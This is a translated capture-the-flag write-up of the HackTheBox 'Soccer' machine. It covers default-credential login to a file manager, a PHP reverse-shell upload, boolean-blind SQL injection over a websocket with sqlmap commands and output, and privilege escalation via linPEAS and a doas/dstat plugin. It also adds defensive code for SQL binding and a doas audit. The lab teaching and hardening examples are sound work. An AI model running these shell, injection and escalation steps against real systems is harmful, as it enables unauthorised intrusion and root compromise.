[Original] HTB Soccer (EASY)

Posted: 2022-12-25 23:29 1267
Reference:
https://meowmeowattack.github.io/htb/soccer/
Start with a port scan, as usual.
Write the hostname into /etc/hosts with vim.
Run a directory brute-force.
http://soccer.htb/tiny/
It also turns up http://soccer.htb/tiny/uploads/, which is not accessible; set it aside for now.
The site is H3K's; a search shows it is an open-source project on GitHub:
https://github.com/prasathmani/tinyfilemanager
Try the default credentials admin:admin@123 and the login succeeds.
Upload a shell into the uploads directory:
/usr/share/webshells/php/php-reverse-shell.php
After the shell has uploaded, open it in the browser:
http://soccer.htb/tiny/uploads/tmp/w.php
That gives a shell on the box.
Checking nginx with ls /etc/nginx/sites-available/ shows another site, soc-player.soccer.htb.
http://soc-player.soccer.htb/signup
Create an account, then log in.
After logging in, the page http://soc-player.soccer.htb/check has a ticket-checking feature where you can search for a ticket. Inspecting the HTML source shows that this feature talks to a websocket.
The site may have a SQL injection vulnerability. Searching for "sqli websocket" turns up this article:
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
We can use the python script from that post as a proxy: sqlmap sends its requests to localhost:8081 (defined in the python script), and the script forwards them to the target host's websocket on port 9091. For our setup to work, the script needs a couple of changes.
--flush-session clears the cached session; --technique B selects boolean-based blind injection.
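The server-side bug class behind a websocket ticket lookup like the one on /check, shown as an added example that is mine rather than the author's or the box's code. The ticket table, the handler names (lookup_ticket_vulnerable, lookup_ticket_fixed) and the messages are constructed, and an in-memory SQLite table stands in for the MySQL backend; the point is the contrast between formatting the id into the query and binding it.

```python
import json
import sqlite3


def make_db():
    """Constructed sample data standing in for the ticket table on the box."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [(1, "player@soccer.htb"), (2, "other@soccer.htb")],
    )
    return conn


def lookup_ticket_vulnerable(conn, message):
    """The pattern that makes blind injection over the websocket possible:
    the id taken from the JSON message is formatted straight into the SQL."""
    ticket_id = json.loads(message)["id"]
    sql = "SELECT id FROM accounts WHERE id = %s" % ticket_id  # no binding, no validation
    return [row[0] for row in conn.execute(sql)]


def lookup_ticket_fixed(conn, message):
    """Hardened version: reject anything that is not a numeric id, then bind
    the value so the database never sees it as SQL."""
    ticket_id = json.loads(message)["id"]
    if not str(ticket_id).isdigit():
        return []
    return [
        row[0]
        for row in conn.execute("SELECT id FROM accounts WHERE id = ?", (int(ticket_id),))
    ]


if __name__ == "__main__":
    db = make_db()
    # A legitimate check behaves the same with either handler.
    print(lookup_ticket_vulnerable(db, '{"id":"1"}'))  # [1]
    print(lookup_ticket_fixed(db, '{"id":"1"}'))       # [1]
    # A boolean condition in the id changes the result set of the vulnerable
    # handler, which is exactly the signal a boolean-based blind technique reads.
    print(lookup_ticket_vulnerable(db, '{"id":"1 OR 1=1"}'))  # [1, 2]
    print(lookup_ticket_fixed(db, '{"id":"1 OR 1=1"}'))       # []
```

The fix is two independent layers: the type check turns the whole class of non-numeric input into an empty answer, and the bound parameter protects the query even if the validation is later loosened.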
Log in with the credentials player / PlayerOftheMatch2022:
ssh player@10.10.11.194
Use linPEAS to help with privilege escalation:
https://blog.csdn.net/weixin_43571641/article/details/124374117
https://github.com/carlospolop/PEASS-ng
https://github.com/carlospolop/PEASS-ng/releases/download/20221225/linpeas.sh
Running it this way leaves no file behind on the box; locally, serve it with python3 -m http.server 80.
The script prints a lot of output.
What stands out is doas.
This page covers privilege escalation through it:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#doas
man dstat shows the dstat manual.
It supports custom plugins, whose names start with dstat_.
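An audit helper for the doas-plus-dstat situation described above, added here as my own example (not the author's code and not anything from the box). It parses doas.conf rules, keeps those that let a given user run dstat as root, and reports any dstat plugin directory that user can write to, since dstat loads dstat_*.py from those directories and a writable one turns the rule into arbitrary code as root. The sample configuration, the user name and the /tmp path are constructed; the box's real /etc/doas.conf is not on the page. Plugin locations are the ones named in the dstat man page, with the per-user ~/.dstat/ supplied by the caller.

```python
import os
import shlex

# System-wide plugin search locations from the dstat man page.
SYSTEM_PLUGIN_DIRS = ["/usr/share/dstat", "/usr/local/share/dstat"]


def parse_doas_rules(conf_text):
    """Parse doas.conf lines into dicts; setenv { ... } blocks are skipped.
    Simplification: doas honours the *last* matching rule; resolving
    precedence between several rules is left to the caller."""
    rules = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = shlex.split(line)
        action, rest = tokens[0], tokens[1:]
        options = []
        while rest:
            if rest[0] in ("nopass", "nolog", "persist", "keepenv"):
                options.append(rest.pop(0))
            elif rest[0] == "setenv":
                # drop "setenv", "{", the assignments, and the closing "}"
                end = next(i for i, t in enumerate(rest) if t.endswith("}"))
                rest = rest[end + 1:]
            else:
                break
        identity = rest.pop(0)
        target = None
        if rest[:1] == ["as"]:
            target, rest = rest[1], rest[2:]
        cmd = rest[1] if rest[:1] == ["cmd"] else None
        rules.append({"line": line, "action": action, "options": options,
                      "identity": identity, "target": target, "cmd": cmd})
    return rules


def audit_doas_dstat(conf_text, user, plugin_dirs, is_writable=None):
    """Return one finding per (rule, directory) where `user` may run dstat as
    root and the plugin directory is writable. Writability defaults to
    os.access for the invoking user, so run this as the user being audited;
    is_writable can be injected for a dry run."""
    if is_writable is None:
        def is_writable(path):
            return os.path.isdir(path) and os.access(path, os.W_OK)
    findings = []
    for rule in parse_doas_rules(conf_text):
        if rule["action"] != "permit" or rule["identity"] != user:
            continue
        if rule["target"] not in (None, "root"):  # doas targets root by default
            continue
        # cmd None means "any command", which includes dstat
        if rule["cmd"] is not None and os.path.basename(rule["cmd"]) != "dstat":
            continue
        for directory in plugin_dirs:
            if is_writable(directory):
                findings.append({"rule": rule["line"], "dir": directory})
    return findings


if __name__ == "__main__":
    # Constructed sample configuration, not the box's real /etc/doas.conf.
    sample_conf = (
        "permit persist :wheel\n"
        "permit nopass player as root cmd /usr/bin/dstat\n"
    )
    home = os.path.expanduser("~player")
    dirs = SYSTEM_PLUGIN_DIRS + [os.path.join(home, ".dstat")]
    for finding in audit_doas_dstat(sample_conf, "player", dirs):
        print("risk: rule %r with writable plugin directory %s"
              % (finding["rule"], finding["dir"]))
```

The remediation the audit points at is the usual one: either drop the rule, or make every directory on dstat's plugin path root-owned and not writable by the permitted user.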
rustscan 10.10.11.194
dirsearch -u http://soccer.htb/ -x 403,401 -w /usr/share/wordlists/dirb/big.txt
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
ws_server = "ws://soc-player.soccer.htb:9091"  # line: 6
...
data = '{"id":"%s"}' % message  # line: 15; this format is found by inspecting the traffic and looking at the search response
python socer.py
sqlmap -u "http://localhost:8081/?id=1" -p "id"
sqlmap -u "http://localhost:8081/?id=1" -p "id" --batch --dbs
sqlmap -u http://localhost:8081/?id=1 -p id --random-agent --dbms mysql --dbs --technique B --level 5 --risk 3 -t 5 --flush-session
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys